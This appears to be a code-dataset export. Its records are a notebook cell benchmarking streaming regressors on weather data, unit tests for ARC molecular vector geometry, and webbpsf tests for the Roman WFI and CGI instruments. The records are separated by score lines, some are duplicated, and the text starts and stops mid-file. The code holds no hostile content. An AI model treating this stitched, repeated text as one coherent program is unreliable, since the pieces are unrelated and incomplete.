tdf = pd.DataFrame(scaler.fit_transform(df.values), columns=df.columns.copy(), index=df.index)
#%%
fig, ax = plt.subplots(ncols=2)
df.drop(columns=["Pressure (millibars)", "Wind Bearing (degrees)"]).resample("W").mean().plot(ax=ax[0], title="unscaled")
tdf.drop(columns=["Pressure (millibars)", "Wind Bearing (degrees)"]).resample("W").mean().plot(ax=ax[1], title="scaled")
#%%
tdf.info()
X = tdf[["Pressure (millibars)", "Humidity", "Wind Speed (km/h)"]].resample("6H").mean()
y = tdf[["Temperature (C)"]].resample("6H").max()
X.plot(subplots=True, layout=(1,3))
y.plot()
#%%
reload(samknnreg)
from samknnreg import SAMKNNRegressor
sam = SAMKNNRegressor()
hat = RegressionHAT()
rht = RegressionHoeffdingTree()
ds = DataStream(X, y=y)
ds.prepare_for_use()
evaluator = EvaluatePrequential(show_plot=True,
n_wait=730,
batch_size=28,
metrics=[
'mean_square_error',
'true_vs_predicted'])
#%%
evaluator.evaluate(
stream=ds,
model=[sam, rht, hat ],
model_names=["SAM", "Hoeffding Tree Regressor", "Hoeffding Tree Regressor (Adaptive)"])
#%%
| 0.300027 | 0.36659 |
import math
import unittest
import arc.species.converter as converter
import arc.species.vectors as vectors
from arc.species.species import ARCSpecies
class TestVectors(unittest.TestCase):
"""
Contains unit tests for the vectors module
"""
@classmethod
def setUpClass(cls):
"""
A method that is run before all unit tests in this class.
"""
cls.maxDiff = None
def test_get_normal(self):
"""Test calculating a normal vector"""
v1 = [6, 0, 0]
v2 = [0, 3, 0]
n = vectors.get_normal(v1, v2)
self.assertEqual(n[0], 0)
self.assertEqual(n[1], 0)
self.assertEqual(n[2], 1)
v1 = [5, 1, 1]
v2 = [1, 8, 2]
n = vectors.get_normal(v1, v2)
expected_n = vectors.unit_vector([-6, -9, 39])
for ni, expected_ni in zip(n, expected_n):
self.assertEqual(ni, expected_ni)
def test_get_theta(self):
"""Test calculating the angle between two vectors"""
v1 = [-1.45707856 + 0.02416711, -0.94104506 - 0.17703194, -0.20275830 - 0.08644641]
v2 = [-0.03480906 + 0.02416711, 1.11948179 - 0.17703194, -0.82988874 - 0.08644641]
theta = vectors.get_theta(v1, v2)
self.assertAlmostEqual(theta, 1.8962295, 5)
self.assertAlmostEqual(theta * 180 / math.pi, 108.6459, 3)
def test_unit_vector(self):
"""Test calculating a unit vector"""
v1 = [1, 0, 0]
self.assertEqual(vectors.unit_vector(v1)[0], 1.) # trivial
self.assertEqual(vectors.unit_vector(v1)[1], 0.) # trivial
self.assertEqual(vectors.unit_vector(v1)[2], 0.) # trivial
v2 = [1, 1, 1]
self.assertAlmostEqual(vectors.unit_vector(v2)[0], (1 / 3) ** 0.5)
self.assertAlmostEqual(vectors.unit_vector(v2)[1], (1 / 3) ** 0.5)
self.assertAlmostEqual(vectors.unit_vector(v2)[2], (1 / 3) ** 0.5)
def test_set_vector_length(self):
"""Test changing a vector's length"""
v1 = [1, 0, 0]
self.assertEqual(vectors.get_vector_length(v1), 1)
v1_transformed = vectors.set_vector_length(v1, 5)
self.assertAlmostEqual(vectors.get_vector_length(v1_transformed), 5)
v1 = [1, 1, 1]
self.assertEqual(vectors.get_vector_length(v1), 3 ** 0.5)
v1_transformed = vectors.set_vector_length(v1, 5)
self.assertAlmostEqual(vectors.get_vector_length(v1_transformed), 5)
label = 'CNCC'
pivot = 0
xyz = {'symbols': ('N', 'C', 'C', 'C', 'H', 'H', 'H', 'H', 'H', 'H', 'H', 'H', 'H'),
'isotopes': (14, 12, 12, 12, 1, 1, 1, 1, 1, 1, 1, 1, 1),
'coords': ((0.7419854952964929, -0.18588322859265055, -0.8060295165375653),
(-0.38476668007897186, -0.8774643553523614, -0.1815530887172187),
(-1.4977348513273125, 0.05995564693605262, 0.26652181022311233),
(1.5633235727172392, 0.5360966415350092, 0.15477859056711452),
(-0.04458112063725271, -1.4936027355391557, 0.6589418973690523),
(-0.7986335015469359, -1.5715787743431335, -0.9219907626214912),
(-2.348455608682208, -0.5210498432021002, 0.6375394558854425),
(-1.8523669868240424, 0.6790455638159553, -0.5642494434208211),
(-1.170505453235269, 0.7210016856743618, 1.0746899133307615),
(2.4283037770451084, 0.9651590522064675, -0.36083882142892065),
(1.945994527876002, -0.1322800197070601, 0.9328203647772167),
(1.0178974719106297, 1.3595978302624294, 0.6250164549219148),
(0.39953935748654607, 0.4610025363062083, -1.5156468543485933))}
mol = ARCSpecies(label='CNCC', xyz=xyz).mol
v1 = vectors.get_lp_vector(label, mol, xyz, pivot)
self.assertAlmostEqual(vectors.get_vector_length(v1), 1) # should return a unit vector
v1_transformed = vectors.set_vector_length(v1, 5)
self.assertAlmostEqual(vectors.get_vector_length(v1_transformed), 5)
def test_rotate_vector(self):
"""Test rotating a vector"""
point_a, point_b, normal, theta = [0, 0, 0], [0, 0, 1], [0, 0, 1], 90.0 * math.pi / 180 # trivial, no rotation
new_vector = vectors.rotate_vector(point_a, point_b, normal, theta)
self.assertEqual(new_vector, [0, 0, 1])
point_a, point_b, normal, theta = [0, 0, 0], [1, 0, 0], [0, 0, 1], 90.0 * math.pi / 180 # rot x to y around z
new_vector = vectors.rotate_vector(point_a, point_b, normal, theta)
self.assertAlmostEqual(new_vector[0], 0, 5)
self.assertAlmostEqual(new_vector[1], 1, 5)
self.assertAlmostEqual(new_vector[2], 0, 5)
point_a, point_b, normal, theta = [0, 0, 0], [3, 5, 0], [4, 4, 1], 1.2
new_vector = vectors.rotate_vector(point_a, point_b, normal, theta)
self.assertAlmostEqual(new_vector[0], 2.749116, 5)
self.assertAlmostEqual(new_vector[1], 4.771809, 5)
self.assertAlmostEqual(new_vector[2], 1.916297, 5)
def test_get_vector(self):
"""Test getting a vector between two atoms in the molecule"""
xyz1 = converter.str_to_xyz("""O 0.0 0.0 0.0
N 1.0 0.0 0.0""") # trivial
vector = vectors.get_vector(pivot=0, anchor=1, xyz=xyz1)
self.assertAlmostEqual(vector[0], 1.0, 5)
self.assertAlmostEqual(vector[1], 0.0, 5)
self.assertAlmostEqual(vector[2], 0.0, 5)
xyz2 = converter.str_to_xyz("""O -0.39141517 -1.49218505 0.23537907
N -1.29594218 0.36660772 -0.33360920
C -0.24369399 -0.21522785 0.47237314
C 1.11876670 0.24246665 -0.06138419
H -0.34055624 0.19728442 1.48423848
H 1.27917500 -0.02124533 -1.11576163
H 1.93896021 -0.20110894 0.51754953
H 1.21599040 1.33219465 0.01900272
H -2.12405283 -0.11420423 0.01492411
H -1.15723190 -0.09458204 -1.23271202""") # smiles='NC([O])(C)'
vector = vectors.get_vector(pivot=1, anchor=2, xyz=xyz2)
self.assertAlmostEqual(vector[0], 1.052248, 5)
self.assertAlmostEqual(vector[1], -0.581836, 5)
self.assertAlmostEqual(vector[2], 0.805982, 5)
def test_get_lp_vector(self):
"""Test the lone pair vector"""
xyz1 = converter.str_to_xyz("""O 1.13971727 -0.35763357 -0.91809799
N -0.16022228 -0.63832421 -0.32863338
C -0.42909096 0.49864538 0.54457751
H -1.36471297 0.33135829 1.08632108
H 0.37059419 0.63632068 1.27966893
H -0.53867601 1.41749835 -0.03987146
H 0.03832076 -1.45968957 0.24914206
H 0.94407000 -0.42817536 -1.87310674""")
spc1 = ARCSpecies(label='tst1', smiles='CN(O)', xyz=xyz1)
vector = vectors.get_lp_vector(label='tst1', mol=spc1.mol, xyz=xyz1, pivot=1)
self.assertAlmostEqual(vector[0], -0.7582151013592212, 5)
self.assertAlmostEqual(vector[1], -0.14276808320949216, 5)
self.assertAlmostEqual(vector[2], -0.6361816835523585, 5)
self.assertAlmostEqual((sum([vi ** 2 for vi in vector])) ** 0.5, 1)
# puts the following dummy atom in xyz1: 'Cl -0.91844 -0.78109 -0.96482'
xyz2 = converter.str_to_xyz("""N -0.70735114 0.81971647 0.24999886
C 0.58016992 0.65919122 -0.42405305
C 1.44721132 -0.43727777 0.17945348
C -1.63900905 -0.25796649 -0.04936095
H 1.11974047 1.60931343 -0.33768790
H 0.43764604 0.48458543 -1.49689220
H 1.00255021 -1.42757899 0.04242741
H 2.42947502 -0.44523307 -0.30432399
H 1.60341053 -0.27376799 1.25093890
H -1.81252045 -0.34624671 -1.12667881
H -2.60396918 -0.04100469 0.41960198
H -1.29274859 -1.22036999 0.33877281
H -0.56460509 0.87663914 1.25780346""")
spc2 = ARCSpecies(label='tst2', smiles='CNCC', xyz=xyz2)
vector = vectors.get_lp_vector(label='tst2', mol=spc2.mol, xyz=xyz2, pivot=0)
self.assertAlmostEqual(vector[0], -0.40585301456248446, 5)
self.assertAlmostEqual(vector[1], 0.8470158636326891, 5)
self.assertAlmostEqual(vector[2], -0.34328917449449764, 5)
self.assertAlmostEqual((sum([vi ** 2 for vi in vector])) ** 0.5, 1)
# puts the following dummy atom in xyz1: 'Cl -1.1132 1.666732 -0.09329'
if __name__ == '__main__':
unittest.main(testRunner=unittest.TextTestRunner(verbosity=2))
|
arc/species/vectorsTest.py
|
import math
import unittest
import arc.species.converter as converter
import arc.species.vectors as vectors
from arc.species.species import ARCSpecies
class TestVectors(unittest.TestCase):
"""
Contains unit tests for the vectors module
"""
@classmethod
def setUpClass(cls):
"""
A method that is run before all unit tests in this class.
"""
cls.maxDiff = None
def test_get_normal(self):
"""Test calculating a normal vector"""
v1 = [6, 0, 0]
v2 = [0, 3, 0]
n = vectors.get_normal(v1, v2)
self.assertEqual(n[0], 0)
self.assertEqual(n[1], 0)
self.assertEqual(n[2], 1)
v1 = [5, 1, 1]
v2 = [1, 8, 2]
n = vectors.get_normal(v1, v2)
expected_n = vectors.unit_vector([-6, -9, 39])
for ni, expected_ni in zip(n, expected_n):
self.assertEqual(ni, expected_ni)
def test_get_theta(self):
"""Test calculating the angle between two vectors"""
v1 = [-1.45707856 + 0.02416711, -0.94104506 - 0.17703194, -0.20275830 - 0.08644641]
v2 = [-0.03480906 + 0.02416711, 1.11948179 - 0.17703194, -0.82988874 - 0.08644641]
theta = vectors.get_theta(v1, v2)
self.assertAlmostEqual(theta, 1.8962295, 5)
self.assertAlmostEqual(theta * 180 / math.pi, 108.6459, 3)
def test_unit_vector(self):
"""Test calculating a unit vector"""
v1 = [1, 0, 0]
self.assertEqual(vectors.unit_vector(v1)[0], 1.) # trivial
self.assertEqual(vectors.unit_vector(v1)[1], 0.) # trivial
self.assertEqual(vectors.unit_vector(v1)[2], 0.) # trivial
v2 = [1, 1, 1]
self.assertAlmostEqual(vectors.unit_vector(v2)[0], (1 / 3) ** 0.5)
self.assertAlmostEqual(vectors.unit_vector(v2)[1], (1 / 3) ** 0.5)
self.assertAlmostEqual(vectors.unit_vector(v2)[2], (1 / 3) ** 0.5)
def test_set_vector_length(self):
"""Test changing a vector's length"""
v1 = [1, 0, 0]
self.assertEqual(vectors.get_vector_length(v1), 1)
v1_transformed = vectors.set_vector_length(v1, 5)
self.assertAlmostEqual(vectors.get_vector_length(v1_transformed), 5)
v1 = [1, 1, 1]
self.assertEqual(vectors.get_vector_length(v1), 3 ** 0.5)
v1_transformed = vectors.set_vector_length(v1, 5)
self.assertAlmostEqual(vectors.get_vector_length(v1_transformed), 5)
label = 'CNCC'
pivot = 0
xyz = {'symbols': ('N', 'C', 'C', 'C', 'H', 'H', 'H', 'H', 'H', 'H', 'H', 'H', 'H'),
'isotopes': (14, 12, 12, 12, 1, 1, 1, 1, 1, 1, 1, 1, 1),
'coords': ((0.7419854952964929, -0.18588322859265055, -0.8060295165375653),
(-0.38476668007897186, -0.8774643553523614, -0.1815530887172187),
(-1.4977348513273125, 0.05995564693605262, 0.26652181022311233),
(1.5633235727172392, 0.5360966415350092, 0.15477859056711452),
(-0.04458112063725271, -1.4936027355391557, 0.6589418973690523),
(-0.7986335015469359, -1.5715787743431335, -0.9219907626214912),
(-2.348455608682208, -0.5210498432021002, 0.6375394558854425),
(-1.8523669868240424, 0.6790455638159553, -0.5642494434208211),
(-1.170505453235269, 0.7210016856743618, 1.0746899133307615),
(2.4283037770451084, 0.9651590522064675, -0.36083882142892065),
(1.945994527876002, -0.1322800197070601, 0.9328203647772167),
(1.0178974719106297, 1.3595978302624294, 0.6250164549219148),
(0.39953935748654607, 0.4610025363062083, -1.5156468543485933))}
mol = ARCSpecies(label='CNCC', xyz=xyz).mol
v1 = vectors.get_lp_vector(label, mol, xyz, pivot)
self.assertAlmostEqual(vectors.get_vector_length(v1), 1) # should return a unit vector
v1_transformed = vectors.set_vector_length(v1, 5)
self.assertAlmostEqual(vectors.get_vector_length(v1_transformed), 5)
def test_rotate_vector(self):
"""Test rotating a vector"""
point_a, point_b, normal, theta = [0, 0, 0], [0, 0, 1], [0, 0, 1], 90.0 * math.pi / 180 # trivial, no rotation
new_vector = vectors.rotate_vector(point_a, point_b, normal, theta)
self.assertEqual(new_vector, [0, 0, 1])
point_a, point_b, normal, theta = [0, 0, 0], [1, 0, 0], [0, 0, 1], 90.0 * math.pi / 180 # rot x to y around z
new_vector = vectors.rotate_vector(point_a, point_b, normal, theta)
self.assertAlmostEqual(new_vector[0], 0, 5)
self.assertAlmostEqual(new_vector[1], 1, 5)
self.assertAlmostEqual(new_vector[2], 0, 5)
point_a, point_b, normal, theta = [0, 0, 0], [3, 5, 0], [4, 4, 1], 1.2
new_vector = vectors.rotate_vector(point_a, point_b, normal, theta)
self.assertAlmostEqual(new_vector[0], 2.749116, 5)
self.assertAlmostEqual(new_vector[1], 4.771809, 5)
self.assertAlmostEqual(new_vector[2], 1.916297, 5)
def test_get_vector(self):
"""Test getting a vector between two atoms in the molecule"""
xyz1 = converter.str_to_xyz("""O 0.0 0.0 0.0
N 1.0 0.0 0.0""") # trivial
vector = vectors.get_vector(pivot=0, anchor=1, xyz=xyz1)
self.assertAlmostEqual(vector[0], 1.0, 5)
self.assertAlmostEqual(vector[1], 0.0, 5)
self.assertAlmostEqual(vector[2], 0.0, 5)
xyz2 = converter.str_to_xyz("""O -0.39141517 -1.49218505 0.23537907
N -1.29594218 0.36660772 -0.33360920
C -0.24369399 -0.21522785 0.47237314
C 1.11876670 0.24246665 -0.06138419
H -0.34055624 0.19728442 1.48423848
H 1.27917500 -0.02124533 -1.11576163
H 1.93896021 -0.20110894 0.51754953
H 1.21599040 1.33219465 0.01900272
H -2.12405283 -0.11420423 0.01492411
H -1.15723190 -0.09458204 -1.23271202""") # smiles='NC([O])(C)'
vector = vectors.get_vector(pivot=1, anchor=2, xyz=xyz2)
self.assertAlmostEqual(vector[0], 1.052248, 5)
self.assertAlmostEqual(vector[1], -0.581836, 5)
self.assertAlmostEqual(vector[2], 0.805982, 5)
def test_get_lp_vector(self):
"""Test the lone pair vector"""
xyz1 = converter.str_to_xyz("""O 1.13971727 -0.35763357 -0.91809799
N -0.16022228 -0.63832421 -0.32863338
C -0.42909096 0.49864538 0.54457751
H -1.36471297 0.33135829 1.08632108
H 0.37059419 0.63632068 1.27966893
H -0.53867601 1.41749835 -0.03987146
H 0.03832076 -1.45968957 0.24914206
H 0.94407000 -0.42817536 -1.87310674""")
spc1 = ARCSpecies(label='tst1', smiles='CN(O)', xyz=xyz1)
vector = vectors.get_lp_vector(label='tst1', mol=spc1.mol, xyz=xyz1, pivot=1)
self.assertAlmostEqual(vector[0], -0.7582151013592212, 5)
self.assertAlmostEqual(vector[1], -0.14276808320949216, 5)
self.assertAlmostEqual(vector[2], -0.6361816835523585, 5)
self.assertAlmostEqual((sum([vi ** 2 for vi in vector])) ** 0.5, 1)
# puts the following dummy atom in xyz1: 'Cl -0.91844 -0.78109 -0.96482'
xyz2 = converter.str_to_xyz("""N -0.70735114 0.81971647 0.24999886
C 0.58016992 0.65919122 -0.42405305
C 1.44721132 -0.43727777 0.17945348
C -1.63900905 -0.25796649 -0.04936095
H 1.11974047 1.60931343 -0.33768790
H 0.43764604 0.48458543 -1.49689220
H 1.00255021 -1.42757899 0.04242741
H 2.42947502 -0.44523307 -0.30432399
H 1.60341053 -0.27376799 1.25093890
H -1.81252045 -0.34624671 -1.12667881
H -2.60396918 -0.04100469 0.41960198
H -1.29274859 -1.22036999 0.33877281
H -0.56460509 0.87663914 1.25780346""")
spc2 = ARCSpecies(label='tst2', smiles='CNCC', xyz=xyz2)
vector = vectors.get_lp_vector(label='tst2', mol=spc2.mol, xyz=xyz2, pivot=0)
self.assertAlmostEqual(vector[0], -0.40585301456248446, 5)
self.assertAlmostEqual(vector[1], 0.8470158636326891, 5)
self.assertAlmostEqual(vector[2], -0.34328917449449764, 5)
self.assertAlmostEqual((sum([vi ** 2 for vi in vector])) ** 0.5, 1)
# puts the following dummy atom in xyz1: 'Cl -1.1132 1.666732 -0.09329'
if __name__ == '__main__':
unittest.main(testRunner=unittest.TextTestRunner(verbosity=2))
| 0.815416 | 0.748858 |
import os
import numpy as np
import pytest
from webbpsf import roman, measure_fwhm
from astropy.table import Table
from numpy import allclose
GRISM_FILTERS = roman.GRISM_FILTERS
PRISM_FILTERS = roman.PRISM_FILTERS
def detector_substr(detector):
"""
change detector string to match file format
(e.g., "SCA01" -> "SCA_1")
"""
return f"{detector[:3]}_{str(int((detector[3:])))}"
def pupil_path(wfi, mask=None):
"""
dynamically generate current pupil path for a given WFI instance
"""
mask = (wfi._pupil_controller._get_filter_mask(wfi.filter) if mask is None
else mask)
detector = detector_substr(wfi.detector)
base = wfi._pupil_controller._pupil_basepath
file = wfi._pupil_controller.pupil_file_formatters[mask]
return os.path.join(base, file).format(detector)
def test_WFI_psf():
"""
Test that instantiating WFI works and can compute a PSF without
raising any exceptions
"""
wfi = roman.WFI()
wfi.calc_psf(fov_pixels=4)
def test_WFI_filters():
wfi = roman.WFI()
filter_list = wfi.filter_list
for filter in filter_list:
wfi.filter = filter
wfi.calc_psf(fov_pixels=4, oversample=1, nlambda=3)
def test_aberration_detector_position_setter():
detector = roman.FieldDependentAberration(4096, 4096)
with pytest.raises(ValueError) as excinfo:
detector.field_position = (-1, 1)
assert 'pixel_x' in str(excinfo.value), 'Failed to raise exception for small out-of-bounds ' \
'x pixel position'
with pytest.raises(ValueError) as excinfo:
detector.field_position = (4096+1, 1)
assert 'pixel_x' in str(excinfo.value), 'Failed to raise exception for large out-of-bounds ' \
'x pixel position'
with pytest.raises(ValueError) as excinfo:
detector.field_position = (1, -1)
assert 'pixel_y' in str(excinfo.value), 'Failed to raise exception for small out-of-bounds ' \
'y pixel position'
with pytest.raises(ValueError) as excinfo:
detector.field_position = (1, 4096+1)
assert 'pixel_y' in str(excinfo.value), 'Failed to raise exception for large out-of-bounds ' \
'y pixel position'
valid_pos = (1.0, 1.0)
detector.field_position = valid_pos
assert detector._field_position == valid_pos, 'Setting field position through setter did not ' \
'update private `_field_position` value'
def test_WFI_fwhm():
"""
Test that computed PSFs are physically realistic, at least relatively.
Loose test...
"""
wfi = roman.WFI()
wfi.pupilopd = None
wfi.options['jitter'] = None
wfi.filter = 'F062'
fwhm_f062 = measure_fwhm(wfi.calc_psf(oversample= 6))
wfi.filter = 'F184'
fwhm_f184 = measure_fwhm(wfi.calc_psf(oversample= 6))
assert (4.0 > fwhm_f184/fwhm_f062 > 2.0)
def test_WFI_pupil_controller():
wfi = roman.WFI()
for detector in wfi.detector_list:
wfi.detector = detector
assert os.path.isfile(pupil_path(wfi)), f"Pupil file missing: {pupil_path(wfi)}"
# Test detector change was successful
assert wfi.detector == detector, "WFI detector was not set correctly"
assert wfi.pupil == pupil_path(wfi), "pupil path was not set correctly"
# Test pupil mask lock/unlock
for mask in wfi.pupil_mask_list:
# test lock
wfi.lock_pupil_mask(mask)
assert wfi.pupil == pupil_path(wfi, mask), "Pupil path was not set correctly"
# introduce differing filter to modify
wfi.filter = "PRISM" if mask != "PRISM" else "F062"
assert wfi._pupil_controller._pupil_mask == wfi.pupil_mask, "Pupil mask was not set correctly"
# test unlock
wfi.unlock_pupil_mask()
assert wfi.pupil == pupil_path(wfi), f"Pupil mask unlock failed"
assert wfi._pupil_controller._auto_pupil, "Pupil is locked and should not be"
assert wfi._pupil_controller._auto_pupil_mask, "Pupil mask is locked and should not be"
# Test pupil lock/unlock
with pytest.raises(FileNotFoundError) as err:
assert wfi.lock_pupil("file_that_does_not_exist.fits"), "FileNotFoundError was not raised"
this_file = __file__
wfi.lock_pupil(this_file)
assert wfi.pupil == this_file, "Pupil did not lock to proper file."
wfi.unlock_pupil()
assert wfi.pupil == pupil_path(wfi), f"Pupil unlock failed."
assert wfi._pupil_controller._auto_pupil, "Pupil is locked and should not be"
assert wfi._pupil_controller._auto_pupil_mask, "Pupil mask is locked and should not be"
# Test effect of changing the filter on pupil path
for filter in wfi.filter_list:
wfi.filter = filter
assert wfi.pupil == pupil_path(wfi), f"Pupil was not set to correct value for filter {filter}"
# Test persistence of pupil and pupil mask locks through a PSF calculation
wfi2 = roman.WFI()
wfi2.detector = detector
valid_pos = (4000, 1000)
wfi2.detector_position = valid_pos
wfi2.filter = "F129"
wfi2.lock_pupil_mask("GRISM")
wfi2.filter = "F129"
assert wfi2.pupil == pupil_path(wfi2, "GRISM"), "Pupil path was not set correctly"
wfi2.calc_psf(monochromatic=1.3e-6, fov_pixels=4)
assert wfi.pupil_mask == "GRISM", "Pupil mask changed during PSF calculation"
assert wfi2.pupil == pupil_path(wfi2, "GRISM"), "Pupil path changed during PSF calculation"
def test_WFI_detector_position_setter():
wfi = roman.WFI()
wfi.detector = 'SCA01'
valid_pos = (4000, 1000)
wfi.detector_position = valid_pos
assert wfi._detectors[wfi._detector].field_position == valid_pos, (
"Setting field position through Instrument.detector_position did not update field_position "
"for the detector's aberration optic"
)
assert wfi.detector_position == valid_pos, "`detector_position` getter doesn't reflect " \
"assignment to setter"
def test_WFI_includes_aberrations():
wfi = roman.WFI()
wfi.detector = 'SCA01'
osys = wfi.get_optical_system()
assert isinstance(osys[2], roman.FieldDependentAberration), (
"Third plane of Roman WFI optical system should be the "
"field dependent aberration virtual optic"
)
def test_swapping_modes(wfi=None):
if wfi is None:
wfi = roman.WFI()
# change detector string to match file format (e.g., "SCA01" -> "SCA_1")
detector_substr = lambda det: f"{det[:3]}_{str(int((det[3:])))}"
# dynamically generate current pupil path for a given WFI instance
pupil_path = (
lambda self, mask=None: os.path.join(
self._pupil_controller._pupil_basepath,
self._pupil_controller.pupil_file_formatters[self._pupil_controller._get_filter_mask(self.filter) if mask is None else mask]
).format(detector_substr(self.detector))
)
tests = [
# [filter, mode, pupil_file]
['F146', 'imaging', pupil_path],
['F213', 'imaging', pupil_path],
[PRISM_FILTERS[0], 'prism', pupil_path],
[GRISM_FILTERS[0], 'grism', pupil_path],
]
for test_filter, test_mode, test_pupil in tests:
wfi.filter = test_filter
fail_str = (f"failed on {test_filter}, {test_mode}, "
f"{test_pupil(wfi).split('/')[-1]}")
assert wfi.filter == test_filter, fail_str
assert wfi.mode == test_mode, fail_str
assert wfi._current_aberration_file == wfi._aberration_files[test_mode], fail_str
assert wfi.pupil == test_pupil(wfi), fail_str
def test_custom_aberrations():
wfi = roman.WFI()
# Use grism aberration_file for testing
test_aberration_file = wfi._aberration_files['grism']
# Test override
# -------------
wfi.lock_aberrations(test_aberration_file)
for filter in wfi.filter_list:
wfi.filter = filter
assert wfi._current_aberration_file == test_aberration_file, "Filter change caused override to fail"
# Test Release Override
# ---------------------
wfi.unlock_aberrations()
assert wfi._aberration_files['custom'] is None, "Custom aberration file not deleted on override release."
test_swapping_modes(wfi)
def test_WFI_limits_interpolation_range():
wfi = roman.WFI()
det = wfi._detectors['SCA01']
det.get_aberration_terms(1.29e-6)
det.field_position = (0, 0)
det.get_aberration_terms(1.29e-6)
with pytest.raises(ValueError) as excinfo:
det.field_position = (500000, 0)
assert 'Requested pixel_x position' in str(excinfo.value), (
"FieldDependentAberration did not error on out-of-bounds field point"
)
with pytest.raises(ValueError) as excinfo:
det.field_position = (-1, 0)
assert 'Requested pixel_x position' in str(excinfo.value), (
"FieldDependentAberration did not error on out-of-bounds field point"
)
with pytest.raises(ValueError) as excinfo:
det.field_position = (0, 500000)
assert 'Requested pixel_y position' in str(excinfo.value), (
"FieldDependentAberration did not error on out-of-bounds field point"
)
with pytest.raises(ValueError) as excinfo:
det.field_position = (0, -1)
assert 'Requested pixel_y position' in str(excinfo.value), (
"FieldDependentAberration did not error on out-of-bounds field point"
)
det.field_position = (2048, 2048)
# Get min and max valid wavelengths from aberration file
zern = Table.read(wfi._aberration_files[wfi.mode], format='ascii.csv')
min_wv = zern['wavelength'][0] * 1e-6 # convert from micron to meter
max_wv = zern['wavelength'][-1] * 1e-6
# Test that get_aberration_terms() uses an approximated wavelength when
# called with an out-of-bounds wavelength.
too_lo_wv = min_wv * .9; too_hi_wv = max_wv / .9
valid_wv = np.mean([min_wv, max_wv])
assert allclose(det.get_aberration_terms(min_wv),
det.get_aberration_terms(too_lo_wv)), (
"Aberration below wavelength range did not return closest value."
)
assert allclose(det.get_aberration_terms(max_wv),
det.get_aberration_terms(too_hi_wv)), (
"Aberration above wavelength range did not return closest value."
)
# Test border pixels outside the ref data. In Cycle 9, (0, 37) is the first
# pixel, so we check if (0, 0) is approximated to it as the nearest point.
det.field_position = (0, 0)
coefficients_outlier = det.get_aberration_terms(valid_wv)
det.field_position = (0, 37)
coefficients_data = det.get_aberration_terms(valid_wv)
assert np.allclose(coefficients_outlier, coefficients_data), "nearest point extrapolation " \
"failed for outlier field point"
def test_CGI_detector_position():
""" Test existence of the CGI detector position etc, and that you can't set it."""
cgi = roman.CGI()
valid_pos = (512,512)
assert cgi.detector_position == valid_pos, "CGI detector position isn't as expected"
with pytest.raises(RuntimeError) as excinfo:
cgi.detector_position = valid_pos
assert 'not adjustable' in str(excinfo.value), ("Failed to raise exception for"\
"trying to change CGI detector position.")
def test_CGI_psf(display=False):
"""
Just test that instantiating CGI works and can compute a PSF without raising
any exceptions
"""
char_spc = roman.CGI()
char_spc.mode = 'CHARSPC_F660'
#print('Reading instrument data from {:s}'.format(charspc._WebbPSF_basepath)
#print('Filter list: {:}'.format(charspc.filter_list))
monopsf = char_spc.calc_psf(nlambda=1, display=False)
if display:
roman.poppy.display_psf(monopsf)
|
webbpsf/tests/test_roman.py
|
import os
import numpy as np
import pytest
from webbpsf import roman, measure_fwhm
from astropy.table import Table
from numpy import allclose
GRISM_FILTERS = roman.GRISM_FILTERS
PRISM_FILTERS = roman.PRISM_FILTERS
def detector_substr(detector):
"""
change detector string to match file format
(e.g., "SCA01" -> "SCA_1")
"""
return f"{detector[:3]}_{str(int((detector[3:])))}"
def pupil_path(wfi, mask=None):
"""
dynamically generate current pupil path for a given WFI instance
"""
mask = (wfi._pupil_controller._get_filter_mask(wfi.filter) if mask is None
else mask)
detector = detector_substr(wfi.detector)
base = wfi._pupil_controller._pupil_basepath
file = wfi._pupil_controller.pupil_file_formatters[mask]
return os.path.join(base, file).format(detector)
def test_WFI_psf():
"""
Test that instantiating WFI works and can compute a PSF without
raising any exceptions
"""
wfi = roman.WFI()
wfi.calc_psf(fov_pixels=4)
def test_WFI_filters():
wfi = roman.WFI()
filter_list = wfi.filter_list
for filter in filter_list:
wfi.filter = filter
wfi.calc_psf(fov_pixels=4, oversample=1, nlambda=3)
def test_aberration_detector_position_setter():
detector = roman.FieldDependentAberration(4096, 4096)
with pytest.raises(ValueError) as excinfo:
detector.field_position = (-1, 1)
assert 'pixel_x' in str(excinfo.value), 'Failed to raise exception for small out-of-bounds ' \
'x pixel position'
with pytest.raises(ValueError) as excinfo:
detector.field_position = (4096+1, 1)
assert 'pixel_x' in str(excinfo.value), 'Failed to raise exception for large out-of-bounds ' \
'x pixel position'
with pytest.raises(ValueError) as excinfo:
detector.field_position = (1, -1)
assert 'pixel_y' in str(excinfo.value), 'Failed to raise exception for small out-of-bounds ' \
'y pixel position'
with pytest.raises(ValueError) as excinfo:
detector.field_position = (1, 4096+1)
assert 'pixel_y' in str(excinfo.value), 'Failed to raise exception for large out-of-bounds ' \
'y pixel position'
valid_pos = (1.0, 1.0)
detector.field_position = valid_pos
assert detector._field_position == valid_pos, 'Setting field position through setter did not ' \
'update private `_field_position` value'
def test_WFI_fwhm():
"""
Test that computed PSFs are physically realistic, at least relatively.
Loose test...
"""
wfi = roman.WFI()
wfi.pupilopd = None
wfi.options['jitter'] = None
wfi.filter = 'F062'
fwhm_f062 = measure_fwhm(wfi.calc_psf(oversample= 6))
wfi.filter = 'F184'
fwhm_f184 = measure_fwhm(wfi.calc_psf(oversample= 6))
assert (4.0 > fwhm_f184/fwhm_f062 > 2.0)
def test_WFI_pupil_controller():
wfi = roman.WFI()
for detector in wfi.detector_list:
wfi.detector = detector
assert os.path.isfile(pupil_path(wfi)), f"Pupil file missing: {pupil_path(wfi)}"
# Test detector change was successful
assert wfi.detector == detector, "WFI detector was not set correctly"
assert wfi.pupil == pupil_path(wfi), "pupil path was not set correctly"
# Test pupil mask lock/unlock
for mask in wfi.pupil_mask_list:
# test lock
wfi.lock_pupil_mask(mask)
assert wfi.pupil == pupil_path(wfi, mask), "Pupil path was not set correctly"
# introduce differing filter to modify
wfi.filter = "PRISM" if mask != "PRISM" else "F062"
assert wfi._pupil_controller._pupil_mask == wfi.pupil_mask, "Pupil mask was not set correctly"
# test unlock
wfi.unlock_pupil_mask()
assert wfi.pupil == pupil_path(wfi), f"Pupil mask unlock failed"
assert wfi._pupil_controller._auto_pupil, "Pupil is locked and should not be"
assert wfi._pupil_controller._auto_pupil_mask, "Pupil mask is locked and should not be"
# Test pupil lock/unlock
with pytest.raises(FileNotFoundError) as err:
assert wfi.lock_pupil("file_that_does_not_exist.fits"), "FileNotFoundError was not raised"
this_file = __file__
wfi.lock_pupil(this_file)
assert wfi.pupil == this_file, "Pupil did not lock to proper file."
wfi.unlock_pupil()
assert wfi.pupil == pupil_path(wfi), f"Pupil unlock failed."
assert wfi._pupil_controller._auto_pupil, "Pupil is locked and should not be"
